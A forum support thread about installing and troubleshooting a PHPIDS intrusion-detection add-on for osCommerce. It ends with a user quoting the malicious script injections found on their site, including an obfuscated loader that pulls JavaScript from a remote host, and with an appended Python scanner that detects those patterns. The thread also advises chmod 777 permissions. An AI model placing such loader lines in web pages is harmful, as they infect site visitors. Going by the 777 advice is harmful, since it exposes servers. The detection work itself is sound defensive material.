celextel

PHP Intrusion Detection System for osCommerce


Thanks for That Celextel,

 

I have had this logged about 15 times today - so I have made the code changes you suggested.

 

Is there a quick way to clear the log?

 

Thanks

 

We would try to include this function "Clear All Logs" in the next version.


Hi,

 

Just installed on my second web-site and now I am getting the following error when trying to carry out the first test:

 

 

 

Line 170 is

$this->handle = new PDO(

 

I have checked the installation several times and can't see where the error may be, so I have had to revert my application_top.php back to the pre-mod condition.

 

Thanks

 

Perhaps you do not have the database installed. Please do that or go through each of the steps carefully.


Hi Celextel,

 

Found the problem - PDO was not enabled on the server that hosts my second site.

 

Host has now configured it and it works fine

 

Thanks


Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.


Hi Celextel,

 

Found the problem - PDO was not enabled on the server that hosts my second site.

 

Host has now configured it and it works fine

 

Thanks

 

Okay. Thanks for this info.


Hi,

 

I have just been testing my site as a bogus shopper.

 

When I amend quantities or delete items from my cart, phpids logs it as an intrusion attempt with an impact score of 7.

 

Would I be safe adding the following to my exclusions to stop this happening all the time:

 

Request.products_id

Get.products_id

Post.products_id

 

Thanks



Hi,

 

I have just been testing my site as a bogus shopper.

 

When I amend quantities or delete items from my cart, phpids logs it as an intrusion attempt with an impact score of 7.

 

Would I be safe adding the following to my exclusions to stop this happening all the time:

 

Request.products_id

Get.products_id

Post.products_id

 

Thanks

 

It should be safe to add these under exclusions. We do not have this issue in our website. Are you using an Ajax-based shopping cart?


NEW!!

 

PHPIDS for osCommerce 1.5

1. PHPIDS main configuration and Table creation codes moved to new installer file.

 

2. Link added to the PHPIDS Log Report file in the admin for deleting all log entries by a single click.


Hi,

 

We do not have this issue in our website. Are you using an Ajax-based shopping cart?

 

Some elements of the cart are ajax based - but only the delete from cart button function, this is the element that generated the logs I think.

 

Thanks



Hi,

 

 

 

Some elements of the cart are ajax based - but only the delete from cart button function, this is the element that generated the logs I think.

 

Thanks

 

Okay, thanks.


NEW!!

 

PHPIDS 0.6.4 is ready

1. Download "PHPIDS 0.6.4 (ZIP)" at the following page:

http://php-ids.org/downloads/

 

2. Unzip the zipped file and rename "phpids-0.6.4" directory as "phpids".

 

3. Make sure that this renamed directory has the following directories directly in it:

docs

lib

tests

 

4. Upload this "phpids" directory to the osCommerce catalog/includes/ directory overwriting the old files.


Thanks for the fast reply.

 

The contribution works so well, and the install was straightforward.

 

One small change I have made is that I have taken the HTML element of the "Blocked.php" file from the IP trap contribution and included it in the banned.php file, so now rather than a "plain" banned page people who get banned will get the banned page with "Stop" image and black and red text etc.

 

If anyone is interested I will post the code for the new banned.php here

 

Thanks

 

Yes, I am interested in seeing the code. Also, I didn't see any instructions for removing your original IP Trap contribution. Is there any easy uninstall or just go in the reverse of the install instructions?

 

 

Thanks,

 

ed


I didn't see any instructions for removing your original IP Trap contribution. Is there any easy uninstall or just go in the reverse of the install instructions?

 

 

Thanks,

 

ed

 

IP Trap contribution is not ours. Yes, you have to go in the reverse of the install instructions to un-install that. It should not be difficult.


After running the installer I received this:

 

New Table for PHPIDS Log Report Created!

New Table for Banned IP Created!

 

Warning: Cannot modify header information - headers already sent by (output started at /home3/dreamdol/public_html/admin/phpids_installer.php:33) in /home3/dreamdol/public_html/admin/phpids_installer.php on line 133

 

 

All still ok?

 

thanks.

ed


After running the installer I received this:

 

New Table for PHPIDS Log Report Created!

New Table for Banned IP Created!

 

Warning: Cannot modify header information - headers already sent by (output started at /home3/dreamdol/public_html/admin/phpids_installer.php:33) in /home3/dreamdol/public_html/admin/phpids_installer.php on line 133

 

 

All still ok?

 

thanks.

ed

 

Perhaps the installer has already installed the PHPIDS configuration settings. Please check. If not, run the installer again.


This looks to be a great contribution so thank you in advance, however, I am having a few problems.

 

Test 1 Shows this:

Your IP address has been logged -- Your IP is:

173.27.14.172

You shouldn't be here, so go away!

 

Versus what was in the documentation for 6.3

 

Test 2 Shows this:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@dreamdolldesigns.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

 

Browse to homepage Shows this:

1146 - Table 'dreamdol_ecom.TABLE_BANNED_IP' doesn't exist

select ip_address from TABLE_BANNED_IP where ip_status='0'

[TEP STOP]

 

Looking at phpMyAdmin shows 2 new tables - banned_ip & phpids_intrusions

 

Step A - includes/modules/osc_phpids.php

Currently reads:

$oscBasePath = DIR_WS_INCLUDES;

$basePath = $oscBasePath . 'phpids/lib/'

 

Does not look like I need to mod the base path using v6.4 even though I don't have a catalog folder (installed in root by host) or is this my problem above?

 

 

thanks, ed


I fixed the home page error regarding the missing DB table ... missed one update to includes/database_tables.php (oops)

 

Any thoughts on the others?

 

thanks, ed


The plot thickens ...

 

I added my IP to the banned IP list through the admin site.

 

I got a vanilla banned message but when I clicked "Contact Us" ... I got this:

 

Fatal error: Call to a member function add_current_page() on a non-object in /home3/dreamdol/public_html/includes/application_top.php on line 397

 

Removed my IP from banned and same error no matter what page I try to go to!

 

Everything was working fine with this mod installed for over thirty minutes so hard to believe a core problem with application_top.

 

Please help

 

thanks, ed


Well,

 

I got rid of the fatal error with a reboot ... even though I cleared my cache I guess it was stuck in a session ... So, ignore my last post ... will continue testing.

 

Still need help on the earlier post though.

 

thanks, ed


This looks to be a great contribution so thank you in advance, however, I am having a few problems.

 

Test 1 Shows this:

Your IP address has been logged -- Your IP is:

173.27.14.172

You shouldn't be here, so go away!

 

Versus what was in the documentation for 6.3

 

Test 2 Shows this:

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@dreamdolldesigns.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

 

thanks, ed

 

Do you have any other contribution like XS shield installed?

 

PHPIDS would not work with XS shield.

 

>> You shouldn't be here, so go away!

We do not have this warning message in PHPIDS. You need to find out as to which contribution is generating this message. It could be also from the server.

 

>> Internal Server Error

This is not related to PHPIDS. You should create a support request with the web host to do the needful in regard to this [error handling].

 

Please refer to the first page of this thread in regard to this:

Just to clarify, no, that's not a 404 you're getting. It's a 406. The 404 comes from not having your own error document (e.g., /406.shtml) for error 406. It's stupid to configure Apache that way (report a 404 when it can't find your error handler), but that's how most servers have it. Read http://www.catskilltech.com/freeSW/SMF/faqs/index.html#errorpages


I try to get to my site and I am getting

 

Warning: require_once(IDS/Init.php) [function.require-once]: failed to open stream: No such file or directory in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

Fatal error: require_once() [function.require]: Failed opening required 'IDS/Init.php' (include_path='.:/usr/lib/php:/usr/local/lib/php:includes/phpids/lib/') in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

What did I forget?


Peace is possible.. Please don't give up.

 

"War is --the old betraying the young"


I try to get to my site and I am getting

 

Warning: require_once(IDS/Init.php) [function.require-once]: failed to open stream: No such file or directory in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

Fatal error: require_once() [function.require]: Failed opening required 'IDS/Init.php' (include_path='.:/usr/lib/php:/usr/local/lib/php:includes/phpids/lib/') in /home/hera/public_html/shop/includes/modules/osc_phpids.php on line 90

 

What did I forget?

 

It is not finding the Init.php file inside the phpids directory. Please make sure that you have gone through following "Step-A: Core" carefully:

 

1. Download "PHPIDS 0.6.4 (ZIP)" or the latest version at:

http://php-ids.org/downloads/

 

2. Unzip the zipped file and rename "phpids-0.6.4" directory as "phpids".

 

3. Make sure that this renamed directory has the following directories directly in it:

docs

lib

tests

 

4. Upload this "phpids" directory to the osCommerce catalog/includes/ directory. If you upload this to some other directory, you need to change oscBasePath to this path in the includes/modules/osc_phpids.php file.

 

5. Grant write access [chmod 777] to the "tmp" folder [phpids/lib/IDS/tmp] and also to phpids_log.txt log file which is inside the "tmp" folder.

 

The last step is also most important.


NEW!!

 

PHPIDS for osCommerce 1.6

1. A coding error / logical error has been corrected and usage of $_SERVER['PHP_SELF'] has been changed for security reasons in the banned_ip module file.

 

2. Usage of $_SERVER['PHP_SELF'] has been changed in the phpids_installer.php file.

 

3. PHPIDS 0.6.4 is ready. Overwrite the old files.


I have installed PHPIDS for osCommerce 1.6.

 

On my localhost it works without any problems. But on the server I get an error message:

 

Parse error: syntax error, unexpected '{' in /homepages/39/d154657769/htdocs/doma-shop/includes/modules/osc_phpids.php on line 92

 

I think it could be the PHP-Version:

localhost: 5.2.3

Server: 4.4.9

 

How can we change the code?


I have installed PHPIDS for osCommerce 1.6.

 

On my localhost it works without any problems. But on the server I get an error message:

 

Parse error: syntax error, unexpected '{' in /homepages/39/d154657769/htdocs/doma-shop/includes/modules/osc_phpids.php on line 92

 

I think it could be the PHP-Version:

localhost: 5.2.3

Server: 4.4.9

 

How can we change the code?

 

Yes, this works only in PHP 5. Changing the codes would be difficult.

Refer to the following URL in regard to this:

http://forum.php-ids.org/comments.php?DiscussionID=25&page=1#Item_0

 

convince your hoster to provide PHP5 or change your hoster. Drupal, phpMyAdmin, etc. pp. won't support PHP4 nevertheless in a few months. So I do not see why we should support an outdated platform.


Hello, I just found a virus on my site:

 

includes/general.js

line 192

document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>');

 

includes/languages/english/index.php also german, spanish and italian

line 42

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

 

admin/index.php

line 12

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

my_admin_name/index.php

line 124

 

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

and so on, more than 20 files infected; the security mod will not prevent this.
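
A small scanner for the injection pattern described in the post above, as an added example that is not part of the original thread: it flags the split-string document.write, a script tag loading from a URL with an explicit port, and the 32-hex-character comment marker. The sample tree, host name and marker value are constructed placeholders, and the pattern names are this example's own.

```python
import os
import re
import tempfile

# Patterns derived from the injected lines quoted in the post above.
PATTERNS = {
    # document.write() assembling a <script> tag from split string pieces
    "split-script-write": re.compile(
        r"""document\.write\(\s*['"]<s['"]\s*\+\s*['"]cript""", re.I),
    # <script src=...> pulling from an absolute URL with an explicit port
    "remote-script-with-port": re.compile(
        r"""<script[^>]+src\s*=\s*['"]https?://[^/'"\s]+:\d+/""", re.I),
    # HTML comment holding exactly 32 hex characters (the trailing marker)
    "hex-marker-comment": re.compile(r"<!--[0-9a-f]{32}-->", re.I),
}

def scan_tree(root, extensions=(".php", ".js", ".html", ".htm")):
    """Return sorted (relative_path, line_number, pattern_name) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in (f for f in files if f.lower().endswith(extensions)):
            rel = os.path.relpath(os.path.join(dirpath, fname), root)
            with open(os.path.join(root, rel), encoding="utf-8",
                      errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for name, rx in PATTERNS.items():
                        if rx.search(line):
                            findings.append((rel, lineno, name))
    return sorted(findings)

def demo():
    """Scan a constructed tree; host and marker values are placeholders."""
    samples = {
        "includes/general.js": "function ok() {}\ndocument.write('<s'+'cript "
            "src=\"http://host.example.invalid:8080/x.js\"></scr'+'ipt>');\n",
        "admin/index.php": "<?php // page ?>\n<script type=\"text/javascript\" "
            "src=\"http://host.example.invalid:8080/x.js\"></script>\n"
            "<!--0123456789abcdef0123456789abcdef-->\n",
        "includes/clean.php": '<script src="js/jquery.js"></script>\n',
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, lineno, name in demo():
        print(f"{rel}:{lineno}: {name}")
```

Point `scan_tree()` at a copy of the catalog directory and compare flagged files against a known-good release before restoring them.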
